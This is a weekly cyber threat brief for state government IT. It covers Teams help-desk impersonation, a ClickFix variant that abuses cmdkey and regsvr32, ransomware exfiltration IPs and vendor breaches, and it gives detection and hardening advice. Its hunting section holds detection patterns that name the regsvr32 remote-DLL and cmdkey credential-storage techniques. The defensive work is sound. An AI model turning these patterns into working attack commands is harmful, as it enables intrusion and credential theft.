When Attackers Call You on Teams: The Evolving Threat Landscape Facing State Government IT

<p><strong>Threat Assessment Level: ELEVATED</strong><em>Unchanged from the prior assessment period. Multiple active campaigns targeting government entities, evolving social engineering evasion techniques, a critical infrastructure vendor breach, and fresh nation-state indicators collectively sustain this posture. No single event warranted escalation to HIGH, but the convergence of threats across identity, supply chain, and infrastructure domains demands sustained vigilance.</em></p> <h2><strong>Executive Summary&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <p>This week, the threat environment for state and local government shifted in ways that matter operationally &mdash; not because of a single catastrophic event, but because adversaries are adapting faster than many defensive playbooks. A financially motivated group is now impersonating your IT help desk over Microsoft Teams to deploy persistent malware. The ClickFix social engineering technique &mdash; already a top-tier threat to government &mdash; has evolved to bypass the PowerShell-based detections most SOCs rely on. A major utility technology vendor disclosed a breach that may ripple through state water and energy infrastructure. And Russia&rsquo;s APT28 refreshed its malware toolkit with high-confidence indicators that belong in every state detection stack today.</p> <p>None of these threats exist in isolation. They converge on the same infrastructure your agencies depend on daily: Microsoft 365, Entra ID, Cisco firewalls, and the vendor ecosystem that keeps critical services running. This brief breaks down what changed, what it means, and exactly what to do about it.</p> <h2><strong>What Changed This Week&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Development</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>Google Threat Intelligence Group (GTIG) publishes full analysis of <strong>UNC6692&rsquo;s SNOW malware framework</strong></p> </td> <td> <p>Documents a complete domain-compromise kill chain initiated through Microsoft Teams impersonation &mdash; directly threatens every M365/Teams environment</p> </td> </tr> <tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>CISA adds <strong>4 new entries</strong> to the Known Exploited Vulnerabilities (KEV) catalog</p> </td> <td> <p>Mandatory patching timelines apply to federal systems; state agencies aligned with CISA guidance must prioritize</p> </td> </tr> <tr> <td> <p><strong>22 Apr</strong></p> </td> <td> <p>CyberProof Threat Research documents a <strong>new ClickFix variant</strong> using cmdkey and regsvr32 instead of PowerShell</p> </td> <td> <p>Renders most existing ClickFix detection rules ineffective &mdash; government is an explicit target</p> </td> </tr> <tr> <td> <p><strong>26&ndash;27 Apr</strong></p> </td> <td> <p><strong>WARLOCK SPIDER</strong> (Storm-2603) actor profile refreshed; <strong>Qilin ransomware</strong> FTP exfiltration infrastructure confirmed active</p> </td> <td> <p>U.S. government explicitly listed as a target; active infrastructure IOCs available for blocking</p> </td> </tr> <tr> <td> <p><strong>26 Apr</strong></p> </td> <td> <p><strong>DragonForce</strong> ransomware actor profile updated; active targeting of government and healthcare confirmed</p> </td> <td> <p>Adds to the ransomware pressure on state and local government alongside WARLOCK SPIDER and Akira</p> </td> </tr> <tr> <td> <p><strong>27 Apr</strong></p> </td> <td> <p>CrowdStrike delivers <strong>fresh APT28 (Fancy Bear)</strong> malware indicators at confidence level 90</p> </td> <td> <p>Russia&rsquo;s premier cyber-espionage group has refreshed its tooling &mdash; updated indicators are available via Anomali ThreatStream Next-Gen&nbsp; and CrowdStrike feeds</p> </td> </tr> <tr> <td> <p><strong>13 Apr (disclosed)</strong></p> </td> <td> <p><strong>Itron</strong> discloses unauthorized access to internal IT systems via SEC 8-K filing</p> </td> <td> <p>Itron provides smart meters and grid management to utilities and municipalities nationwide &mdash; supply chain exposure for any state using their products</p> </td> </tr> <tr> <td> <p><strong>27 Apr</strong></p> </td> <td> <p><strong>Vibing.exe</strong> &mdash; a Microsoft Store application linked to a Microsoft GenAI research lab in Beijing &mdash; found harvesting screenshots, audio, clipboard data</p> </td> <td> <p>Demonstrates that the Microsoft Store itself can be a vector for surveillance-capable software on government endpoints</p> </td> </tr> <tr> <td> <p><strong>23 Apr (ongoing)</strong></p> </td> <td> <p>Joint 16-agency advisory confirms <strong>Volt Typhoon</strong> and <strong>Flax Typhoon</strong> remain pre-positioned in U.S. critical infrastructure via 200,000+ compromised SOHO routers</p> </td> <td> <p>The &ldquo;IOC Extinction&rdquo; concept means traditional blocklist defenses are structurally insufficient against these actors</p> </td> </tr> <tr> <td> <p><strong>23 Apr (ongoing)</strong></p> </td> <td> <p>CISA Malware Analysis Report on <strong>FIRESTARTER</strong> firmware backdoor targeting Cisco ASA/FTD firewalls</p> </td> <td> <p>Persists at the pre-OS boot level, surviving standard patching &mdash; forensic verification required per Emergency Directive 25-03</p> </td> </tr> <tr> <td> <p><strong>Apr (ongoing)</strong></p> </td> <td> <p><strong>Microsoft Entra ID</strong> Service Principal privilege escalation vulnerability patched in April 2026 Patch Tuesday</p> </td> <td> <p>Unpatched Entra ID environments remain exposed to tenant admin takeover via Service Principal abuse &mdash; verify patch deployment immediately</p> </td> </tr> </tbody> </table> <h2><strong>Threat Timeline: Key Events (April 2026)</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Actor / Campaign</p> </th> <th> <p>Target Sector</p> </th> </tr> </thead> <tbody> <tr> <td> <p>13 Apr</p> </td> <td> <p>Itron detects unauthorized IT system access</p> </td> <td> <p>Unattributed</p> </td> <td> <p>Energy, Water, Utilities</p> </td> </tr> <tr> <td> <p>22 Apr</p> </td> <td> <p>ClickFix cmdkey/regsvr32 evasion variant documented</p> </td> <td> <p>Financially motivated (multiple affiliates)</p> </td> <td> <p>Government, Commercial</p> </td> </tr> <tr> <td> <p>23 Apr</p> </td> <td> <p>CISA publishes FIRESTARTER MAR; updates Emergency Directive 25-03</p> </td> <td> <p>China-nexus (suspected)</p> </td> <td> <p>Network infrastructure</p> </td> </tr> <tr> <td> <p>23 Apr</p> </td> <td> <p>16-agency advisory on Volt Typhoon / Flax Typhoon SOHO router compromise</p> </td> <td> <p>Volt Typhoon (PLA/MSS), Flax Typhoon (Integrity Technology Group/MSS)</p> </td> <td> <p>U.S. critical infrastructure</p> </td> </tr> <tr> <td> <p>24 Apr</p> </td> <td> <p>GTIG publishes UNC6692 SNOW framework analysis</p> </td> <td> <p>UNC6692 (financially motivated)</p> </td> <td> <p>Enterprise, Government</p> </td> </tr> <tr> <td> <p>24 Apr</p> </td> <td> <p>CISA adds 4 new KEV entries</p> </td> <td> <p>Multiple</p> </td> <td> <p>Cross-sector</p> </td> </tr> <tr> <td> <p>26 Apr</p> </td> <td> <p>DragonForce ransomware actor profile updated; active targeting confirmed</p> </td> <td> <p>DragonForce</p> </td> <td> <p>Government, Healthcare</p> </td> </tr> <tr> <td> <p>26&ndash;27 Apr</p> </td> <td> <p>WARLOCK SPIDER / Qilin ransomware infrastructure refreshed</p> </td> <td> <p>WARLOCK SPIDER (Storm-2603)</p> </td> <td> <p>Government, Healthcare, Energy</p> </td> </tr> <tr> <td> <p>27 Apr</p> </td> <td> <p>APT28 fresh malware indicators delivered via CrowdStrike</p> </td> <td> <p>APT28 / Fancy Bear (Russia/GRU)</p> </td> <td> <p>Government (targeted)</p> </td> </tr> <tr> <td> <p>27 Apr</p> </td> <td> <p>Vibing.exe surveillance application identified</p> </td> <td> <p>Linked to Microsoft GenAI research (Beijing)</p> </td> <td> <p>Any Microsoft Store user</p> </td> </tr> </tbody> </table> <h2><strong>Key Threat Analysis&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <h3><strong>1. UNC6692 SNOW Framework: Your Help Desk Is Calling &mdash; But It&rsquo;s Not Your Help Desk</strong></h3> <p><strong>What it is:</strong> UNC6692 is a financially motivated threat group that has built a sophisticated attack chain around Microsoft Teams social engineering. The playbook: flood a target&rsquo;s inbox with spam email, then call them on Teams posing as IT support offering to &ldquo;fix&rdquo; the problem. Once the victim grants remote access, the attackers deploy an AutoHotKey-based loader that installs the SNOW malware suite &mdash; <strong>Snowbelt</strong>, <strong>Snowglaze</strong>, and <strong>Snowbasin</strong> &mdash; designed for persistent access, credential harvesting, and ultimately full domain compromise including NTDS.dit exfiltration.</p> <p><strong>Why it matters for state government:</strong> Every state agency runs Microsoft Teams. The attack exploits trust in internal IT communications and requires no malware delivery via email &mdash; it comes through a collaboration platform most security tools treat as trusted. Four independent sources (GTIG, SecurityWeek, HackerNews, SOCPrime) have confirmed the TTPs.</p> <p><strong>Key ATT&amp;CK techniques:</strong> T1566.003 (Spearphishing via Service), T1204.002 (User Execution: Malicious File), T1219 (Remote Access Software), T1059.010 (AutoHotKey scripting), T1078.004 (Cloud Account abuse), T1114.002 (Remote Email Collection)</p> <h3><strong>2. ClickFix Evolves: PowerShell Is Out, LOLBins Are In</strong></h3> <p><strong>What it is:</strong> ClickFix &mdash; the social engineering technique that tricks users into executing malicious commands via fake CAPTCHA pages &mdash; has been one of the most effective initial access vectors against government targets in 2026. This week, researchers documented a significant evolution: the latest variant <strong>abandons PowerShell entirely</strong>. Instead, it chains two native Windows utilities:</p> <ul> <li><strong>cmdkey.exe</strong> &mdash; stores credentials to an attacker-controlled IP address</li> <li><strong>regsvr32.exe</strong> &mdash; loads a remote DLL via UNC path without dropping files to disk</li> </ul> <p>The attack then creates a scheduled task (&ldquo;RunNotepadNow&rdquo;) that pulls its definition from a remote XML file, enabling persistent and updatable command-and-control.</p> <p><strong>Why it matters:</strong> Most SOC detection rules for ClickFix key on PowerShell execution patterns. This variant produces zero PowerShell telemetry. If your detection engineering hasn&rsquo;t been updated for this LOLBin variant, these attacks will sail through undetected. Anomali ThreatStream Next-Gen campaign data explicitly confirms government as a target sector.</p> <p><strong>Key ATT&amp;CK techniques:</strong> T1204.001 (User Execution: Malicious Link), T1059.003 (Windows Command Shell), T1218.010 (Regsvr32 proxy execution), T1053.005 (Scheduled Task persistence), T1078.001 (Default Accounts &mdash; cmdkey credential storage)</p> <h3><strong>3. WARLOCK SPIDER and the Qilin Ransomware Refresh</strong></h3> <p><strong>What it is:</strong> WARLOCK SPIDER (also tracked as Storm-2603, GOLD SALEM) is a ransomware-focused threat group operating the <strong>Qilin</strong> ransomware. This week, their actor profile was refreshed with confirmed active infrastructure &mdash; specifically FTP-based data exfiltration servers at 176.113.115.209 and 176.113.115.97 (confidence: 100). Their target list explicitly includes U.S. government, government public services, healthcare, energy, education, and manufacturing.</p> <p>Alongside WARLOCK SPIDER, the <strong>DragonForce</strong>, <strong>Akira</strong>, and <strong>Everest</strong> ransomware groups all showed updated activity profiles targeting government in the same reporting window. The ransomware ecosystem targeting state and local government is not contracting &mdash; it is actively refreshing infrastructure and expanding.</p> <p><strong>Key ATT&amp;CK techniques:</strong> T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1048.003 (Exfiltration Over Unencrypted Protocol &mdash; FTP)</p> <h3><strong>4. APT28 (Fancy Bear): Fresh Russian Malware Indicators</strong></h3> <p><strong>What it is:</strong> Anomali detected malware indicators attributed to <strong>APT28/Fancy Bear</strong> &mdash; Russia&rsquo;s GRU-linked cyber-espionage group. These are targeted malware samples, not commodity tools. While specific technique details were not included, APT28 historically operates with spearphishing attachments (T1566.001), credential dumping (T1003), and sophisticated C2 over standard web protocols (T1071).</p> <p><strong>Why it matters:</strong> APT28 has a documented history of targeting government entities. Fresh indicators mean refreshed tooling. The specific hash values from this reporting cycle are available through Anomali ThreatStream Next-Gen &mdash; SOC teams should pull the latest APT28 indicators directly from our platform and deploy them to the detection stack immediately.</p> <h3><strong>5. Itron Breach: A Supply Chain Signal for Water and Energy</strong></h3> <p><strong>What it is:</strong> Itron &mdash; a $2.37 billion company providing smart meters, grid management, and data analytics to utilities and municipalities &mdash; disclosed unauthorized access to its internal IT systems via an SEC 8-K filing. The breach was detected on April 13. No ransomware group has claimed responsibility. The company states customer-hosted systems were unaffected, but the investigation is ongoing.</p> <p><strong>Why it matters:</strong> If your state uses Itron products for water monitoring, smart metering, or energy grid management, this is a supply chain exposure that requires active vendor engagement. The absence of a ransomware claim could indicate espionage rather than financial motivation &mdash; which may be worse from a long-term risk perspective.</p> <h3><strong>6. Continuing Threats: Volt Typhoon, FIRESTARTER, and APT41</strong></h3> <p>Three major threats from the prior reporting cycle remain active and unresolved:</p> <ul> <li><strong>Volt Typhoon</strong> and <strong>Flax Typhoon</strong> (China/PLA-MSS) remain pre-positioned in U.S. critical infrastructure via 200,000+ compromised SOHO routers. The joint 16-agency advisory introduced the &ldquo;IOC Extinction&rdquo; concept &mdash; these actors rotate infrastructure so rapidly that traditional blocklists are structurally ineffective. Behavioral detection is the only reliable countermeasure.</li> <li><strong>FIRESTARTER</strong>, a firmware backdoor targeting Cisco ASA/FTD firewalls, persists at the pre-OS boot level and survives standard patching. CISA&rsquo;s Emergency Directive 25-03 requires forensic verification of affected devices.</li> <li><strong>APT41</strong> (China/MSS) maintains active targeting of U.S. state government .NET web applications. No new indicators this cycle, but the campaign remains active.</li> </ul> <h2><strong>Predictive Analysis: What Comes Next</strong></h2> <table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Basis</p> </th> <th> <p>Timeframe</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional UNC6692 SNOW reporting with actionable IOCs (hashes, domains) as GTIG analysis propagates</p> </td> <td> <p><strong>HIGH (&gt;70%)</strong></p> </td> <td> <p>GTIG full analysis published; security community amplification cycle underway</p> </td> <td> <p>3&ndash;5 days</p> </td> </tr> <tr> <td> <p>Itron breach attribution &mdash; ransomware claim on leak site or espionage determination</p> </td> <td> <p><strong>MODERATE (40&ndash;60%)</strong></p> </td> <td> <p>SEC 8-K filed; if ransomware, leak site claim typically follows within 1&ndash;2 weeks</p> </td> <td> <p>1&ndash;2 weeks</p> </td> </tr> <tr> <td> <p>CISA KEV additions for Samsung MagicINFO (CVE-2024-7399) or SharePoint (CVE-2025-53770)</p> </td> <td> <p><strong>MODERATE (40&ndash;60%)</strong></p> </td> <td> <p>Active exploitation campaigns detected; KEV addition follows confirmed exploitation</p> </td> <td> <p>1&ndash;2 weeks</p> </td> </tr> <tr> <td> <p>ClickFix cmdkey/regsvr32 variant used in confirmed government compromise</p> </td> <td> <p><strong>MODERATE (40&ndash;60%)</strong></p> </td> <td> <p>Government explicitly targeted; variant evades common detections</p> </td> <td> <p>2&ndash;4 weeks</p> </td> </tr> <tr> <td> <p>Direct ransomware incident against a U.S. state or local government entity</p> </td> <td> <p><strong>LOW-MODERATE (25&ndash;40%)</strong></p> </td> <td> <p>WARLOCK SPIDER, DragonForce, Akira all actively targeting government; infrastructure refreshed</p> </td> <td> <p>1&ndash;2 weeks</p> </td> </tr> <tr> <td> <p>Volt Typhoon activation (destructive action vs.&nbsp;continued prepositioning)</p> </td> <td> <p><strong>LOW (&lt;20%)</strong></p> </td> <td> <p>Prepositioning posture maintained; activation likely tied to geopolitical trigger</p> </td> <td> <p>Indeterminate</p> </td> </tr> </tbody> </table> <h2><strong>SOC Operational Guidance&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <h3><strong>Immediate Detection Priorities</strong></h3> <p><strong>Hunt Hypothesis 1: ClickFix LOLBin Variant</strong> Adversaries are using cmdkey.exe to store credentials to external IPs and regsvr32.exe to load remote DLLs via UNC paths, bypassing PowerShell-based ClickFix detections.</p> <ul> <li><strong>Monitor:</strong> Process creation events for cmdkey.exe with command-line arguments containing external IP addresses (T1059.003, T1078.001)</li> <li><strong>Monitor:</strong>regsvr32.exe loading DLLs via UNC paths (\\&lt;IP&gt;\&lt;share&gt;\*.dll) (T1218.010)</li> <li><strong>Monitor:</strong> Scheduled task creation with the name &ldquo;RunNotepadNow&rdquo; or tasks pulling XML definitions from remote URLs (T1053.005)</li> <li><strong>Detection logic:</strong> Alert on cmdkey /add commands referencing any non-RFC1918 IP address. Alert on regsvr32 /s /n /i:\\ with external paths.</li> </ul> <p><strong>Hunt Hypothesis 2: UNC6692 Teams-Based Social Engineering</strong> Adversaries are using email bombing followed by Microsoft Teams calls impersonating IT help desk to deploy SNOW malware via AutoHotKey loaders.</p> <ul> <li><strong>Monitor:</strong> Unusual volume of inbound external Teams calls or messages, especially from unverified domains (T1566.003)</li> <li><strong>Monitor:</strong> AutoHotKey process execution (AutoHotKey.exe, .ahk file creation) on endpoints (T1059.010)</li> <li><strong>Monitor:</strong> Remote access tool sessions initiated during or immediately after Teams calls (T1219)</li> <li><strong>Monitor:</strong> Anomalous M365 email access patterns post-compromise &mdash; bulk email reads or forwarding rule creation (T1114.002)</li> <li><strong>Investigate:</strong> Any user-reported &ldquo;IT called me on Teams&rdquo; incidents &mdash; establish a clear internal communication policy that IT will never cold-call via Teams requesting remote access.</li> </ul> <p><strong>Hunt Hypothesis 3: Vibing.exe Surveillance Application</strong> A Microsoft Store application is exfiltrating screenshots, audio, clipboard data, and window titles to an Azure Front Door endpoint.</p> <ul> <li><strong>Hunt:</strong> Search EDR for vibing.exe or Vibing Installer.exe across all managed endpoints</li> <li><strong>Monitor:</strong> WebSocket connections to Azure Front Door endpoints from non-approved applications (T1041)</li> </ul> <p><strong>Hunt Hypothesis 4: Qilin Ransomware Exfiltration</strong> WARLOCK SPIDER is using FTP for pre-encryption data exfiltration to known infrastructure.</p> <ul> <li><strong>Monitor:</strong> Any outbound FTP (port 21) traffic to external destinations &mdash; FTP exfiltration is a hallmark of this group (T1048.003)</li> <li><strong>Investigate:</strong> Outbound FTP connections from servers or workstations that have no business reason for FTP usage</li> </ul> <h3><strong>ATT&amp;CK Technique Summary for This Cycle</strong></h3> <table> <thead> <tr> <th> <p>Technique ID</p> </th> <th> <p>Name</p> </th> <th> <p>Associated Threat</p> </th> </tr> </thead> <tbody> <tr> <td> <p>T1566.003</p> </td> <td> <p>Phishing: Spearphishing via Service</p> </td> <td> <p>UNC6692 SNOW (Teams)</p> </td> </tr> <tr> <td> <p>T1204.001</p> </td> <td> <p>User Execution: Malicious Link</p> </td> <td> <p>ClickFix (fake CAPTCHA)</p> </td> </tr> <tr> <td> <p>T1204.002</p> </td> <td> <p>User Execution: Malicious File</p> </td> <td> <p>UNC6692 SNOW (AutoHotKey)</p> </td> </tr> <tr> <td> <p>T1059.003</p> </td> <td> <p>Command and Scripting: Windows Command Shell</p> </td> <td> <p>ClickFix cmdkey/regsvr32 variant</p> </td> </tr> <tr> <td> <p>T1059.010</p> </td> <td> <p>Command and Scripting: AutoHotKey</p> </td> <td> <p>UNC6692 SNOW</p> </td> </tr> <tr> <td> <p>T1218.010</p> </td> <td> <p>System Binary Proxy Execution: Regsvr32</p> </td> <td> <p>ClickFix LOLBin variant</p> </td> </tr> <tr> <td> <p>T1053.005</p> </td> <td> <p>Scheduled Task/Job</p> </td> <td> <p>ClickFix persistence</p> </td> </tr> <tr> <td> <p>T1078.004</p> </td> <td> <p>Valid Accounts: Cloud Accounts</p> </td> <td> <p>UNC6692, Entra ID flaw</p> </td> </tr> <tr> <td> <p>T1098</p> </td> <td> <p>Account Manipulation</p> </td> <td> <p>Entra ID privilege escalation</p> </td> </tr> <tr> <td> <p>T1114.002</p> </td> <td> <p>Email Collection: Remote Email Collection</p> </td> <td> <p>UNC6692 post-compromise</p> </td> </tr> <tr> <td> <p>T1219</p> </td> <td> <p>Remote Access Software</p> </td> <td> <p>UNC6692 SNOW</p> </td> </tr> <tr> <td> <p>T1486</p> </td> <td> <p>Data Encrypted for Impact</p> </td> <td> <p>WARLOCK SPIDER / Qilin</p> </td> </tr> <tr> <td> <p>T1490</p> </td> <td> <p>Inhibit System Recovery</p> </td> <td> <p>WARLOCK SPIDER / Qilin</p> </td> </tr> <tr> <td> <p>T1048.003</p> </td> <td> <p>Exfiltration Over Unencrypted Protocol (FTP)</p> </td> <td> <p>Qilin ransomware</p> </td> </tr> </tbody> </table> <h2><strong>Sector-Specific Defensive Priorities&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <h3><strong>Financial Services (State Treasury, Revenue, Benefits Systems)</strong></h3> <p>State financial systems process tax payments, benefits disbursements, and procurement transactions &mdash; making them high-value targets for both ransomware operators and credential-theft campaigns.</p> <ul> <li><strong>Priority 1:</strong> UNC6692 SNOW framework poses direct risk to M365-integrated financial workflows. Restrict external Teams access for finance-facing accounts and enforce phishing-resistant MFA (FIDO2) on all accounts with access to financial systems.</li> <li><strong>Priority 2:</strong> ClickFix cmdkey/regsvr32 variant can harvest stored credentials for financial applications. Audit cmdkey credential stores on finance workstations &mdash; no external IPs should be present.</li> <li><strong>Priority 3:</strong> WARLOCK SPIDER/Qilin explicitly targets financial services. Ensure offline backups of financial databases are current and tested. Monitor for outbound FTP from financial system servers.</li> </ul> <h3><strong>Energy (State Energy Offices, Utility Oversight, Grid Interdependencies)</strong></h3> <ul> <li><strong>Priority 1:</strong> The <strong>Itron breach</strong> is the most immediate concern. If your state&rsquo;s regulated utilities or municipal power/water systems use Itron smart meters or grid management platforms, initiate vendor engagement immediately. Request Itron&rsquo;s breach notification letter and assess whether any state-managed or state-overseen systems share network connectivity with Itron infrastructure.</li> <li><strong>Priority 2:</strong><strong>Volt Typhoon</strong> prepositioning in critical infrastructure remains the strategic threat. Behavioral detection of lateral movement (not IOC-based blocking) is the only effective countermeasure. Focus on anomalous authentication patterns in OT-adjacent networks.</li> <li><strong>Priority 3:</strong> Ensure SCADA/ICS networks are segmented from enterprise IT. The convergence of IT breaches (Itron) and OT prepositioning (Volt Typhoon) means a single compromise could bridge both domains.</li> </ul> <h3><strong>Healthcare (State Health Agencies, Medicaid Systems, Public Health)</strong></h3> <ul> <li><strong>Priority 1:</strong> WARLOCK SPIDER/Qilin, DragonForce, and Akira all explicitly target healthcare. State Medicaid systems, public health databases, and hospital oversight systems are in scope. Block Qilin exfiltration IPs and monitor for outbound FTP from healthcare data repositories.</li> <li><strong>Priority 2:</strong> UNC6692 Teams impersonation is particularly dangerous in healthcare environments where IT support interactions are frequent and trust is high. Establish a clear policy: IT will never initiate unsolicited Teams calls requesting remote access.</li> <li><strong>Priority 3:</strong> Ensure HIPAA-regulated data stores have immutable backups. Ransomware actors increasingly target healthcare knowing that patient safety concerns accelerate ransom payment decisions.</li> </ul> <h3><strong>Government (Executive Branch Agencies, Legislature, Courts)</strong></h3> <ul> <li><strong>Priority 1:</strong> ClickFix remains the most likely initial access vector for state government compromise. The cmdkey/regsvr32 variant specifically targets government. Update detection rules immediately &mdash; PowerShell-only monitoring is no longer sufficient.</li> <li><strong>Priority 2:</strong><strong>APT28/Fancy Bear</strong> fresh indicators suggest active Russian intelligence collection against government targets. Pull the current APT28 indicator set from Anomali ThreatStream Next-Gen and deploy to EDR and email security gateways. Brief agency security officers on spearphishing awareness.</li> <li><strong>Priority 3:</strong><strong>APT41</strong> continues targeting state government .NET web applications. Audit all internet-facing .NET applications for current patching status, particularly SharePoint instances (CVE-2025-53770 is under active exploitation by China-origin actors).</li> <li><strong>Priority 4:</strong> Review Microsoft Store application policies. The Vibing.exe incident demonstrates that even &ldquo;trusted&rdquo; app stores can distribute surveillance-capable software. Consider WDAC/AppLocker policies restricting Store installations to an approved whitelist.</li> </ul> <h3><strong>Aviation / Logistics (State DOT, Airport Authorities, Port Systems)</strong></h3> <ul> <li><strong>Priority 1:</strong> WARLOCK SPIDER&rsquo;s target list includes transportation and logistics. State DOT systems managing traffic infrastructure, airport IT networks, and port logistics platforms should be assessed for ransomware readiness &mdash; particularly backup integrity and network segmentation.</li> <li><strong>Priority 2:</strong> Volt Typhoon&rsquo;s prepositioning in critical infrastructure includes transportation systems. Audit SOHO routers and edge devices in DOT field offices and remote transportation management centers for signs of compromise. Replace end-of-life networking equipment that cannot receive firmware updates.</li> <li><strong>Priority 3:</strong> The <strong>FIRESTARTER</strong> Cisco ASA/FTD backdoor is relevant to any agency using Cisco firewalls at transportation facilities. Verify compliance with CISA Emergency Directive 25-03 &mdash; standard patching is insufficient; forensic verification of firmware integrity is required.</li> </ul> <h2><strong>Prioritized Defense Recommendations</strong></h2> <h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Create detection rules for ClickFix LOLBin variant:</strong> Alert on cmdkey.exe with external IP arguments and regsvr32.exe loading DLLs via UNC paths. Existing PowerShell-based ClickFix rules do not detect this variant.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy APT28/Fancy Bear IOCs to detection stack:</strong> Pull the current APT28 malware indicator set (confidence 90) directly from Anomali ThreatStream Next-Gen and CrowdStrike Falcon Intelligence feeds and deploy to EDR and email security gateways.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>Security Awareness</p> </td> <td> <p><strong>Issue advisory to all agency staff:</strong> IT support will never initiate unsolicited Microsoft Teams calls requesting remote access. Any such call should be reported to the SOC immediately.</p> </td> </tr> </tbody> </table> <h3><strong>7-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>IT Ops / M365 Admin</p> </td> <td> <p><strong>Restrict Microsoft Teams external access:</strong> Configure external access policies to block or limit inbound Teams calls and messages from unverified external domains. This is the primary mitigation for UNC6692 SNOW.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>IT Ops</p> </td> <td> <p><strong>Inventory Itron product usage</strong> across all state agencies and utility oversight bodies. If Itron systems are in use, contact the vendor for breach impact assessment and monitor for follow-on advisories.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>IT Ops / IAM</p> </td> <td> <p><strong>Audit Microsoft Entra ID Service Principal permissions.</strong> A recently patched vulnerability allowed privilege escalation to tenant admin via Service Principal abuse. Verify Entra ID agent configurations are current and remove excessive Service Principal privileges. Confirm April 2026 Patch Tuesday updates are deployed.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>IT Ops / M365 Admin</p> </td> <td> <p><strong>Evaluate RemoveMicrosoftCopilotApp Group Policy</strong> for enterprise deployment to reduce attack surface from bundled AI features on managed endpoints.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Tune Teams telemetry:</strong> Enable and review audit logging for external Teams interactions, particularly inbound calls from external tenants and screen-sharing sessions initiated by external users.</p> </td> </tr> </tbody> </table> <h3><strong>30-DAY Actions</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>CISO / Enterprise Architecture</p> </td> <td> <p><strong>Implement Microsoft Store application whitelisting.</strong> Deploy AppLocker or Windows Defender Application Control (WDAC) policies restricting Microsoft Store app installation to an approved list. The Vibing.exe incident proves the Store is not a trusted boundary.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>CISO / Procurement</p> </td> <td> <p><strong>Request security posture assessments from all contracted MSPs.</strong> Require SOC 2 Type II attestation or equivalent. MSP supply chain compromise remains a structurally high risk for state government &mdash; the absence of recent incidents is not evidence of safety.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>CISO / Network Engineering</p> </td> <td> <p><strong>Verify Cisco ASA/FTD firmware integrity</strong> per CISA Emergency Directive 25-03. The FIRESTARTER backdoor persists at the pre-OS boot level and survives standard patching. Forensic verification &mdash; not just patching &mdash; is required.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>CISO / Application Security</p> </td> <td> <p><strong>Audit all internet-facing .NET web applications</strong> for current patching, with specific attention to SharePoint instances. APT41 continues targeting state government .NET applications, and CVE-2025-53770 is under active exploitation.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>CISO / IR Planning</p> </td> <td> <p><strong>Update incident response playbooks</strong> to include Teams-based social engineering scenarios (UNC6692), LOLBin-based ClickFix variants (cmdkey/regsvr32), and supply chain breach response procedures (Itron model). Tabletop these scenarios within 30 days.</p> </td> </tr> </tbody> </table> <h2><strong>The Bottom Line&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <p>The threat actors targeting state government are not standing still. This week alone, we saw a social engineering campaign weaponize Microsoft Teams as an attack platform, a proven phishing technique evolve to evade the detection rules most SOCs have in place, a critical infrastructure vendor disclose a breach with unknown scope, and Russia&rsquo;s most capable cyber-espionage group refresh its malware arsenal.</p> <p>What makes this moment particularly challenging is the convergence. UNC6692 exploits your collaboration platform. ClickFix exploits your users and now evades your detections. Itron&rsquo;s breach threatens your supply chain. Volt Typhoon sits quietly in your infrastructure waiting. These are not separate problems &mdash; they are different facets of the same reality: adversaries are targeting the trust relationships and technology dependencies that make state government function.</p> <p>The good news is that the defensive actions are concrete and achievable. Restricting Teams external access, updating detection rules for LOLBin-based social engineering, blocking known ransomware infrastructure, and inventorying vendor exposure are all actions that can be taken this week with existing resources.</p> <p>The question is not whether these threats will reach your environment. Several of them already have the capability. The question is whether your defenses have kept pace with the adversary&rsquo;s evolution. Based on this week&rsquo;s intelligence, the answer for most state agencies is: not yet &mdash; but the gap is closable if you act now.</p>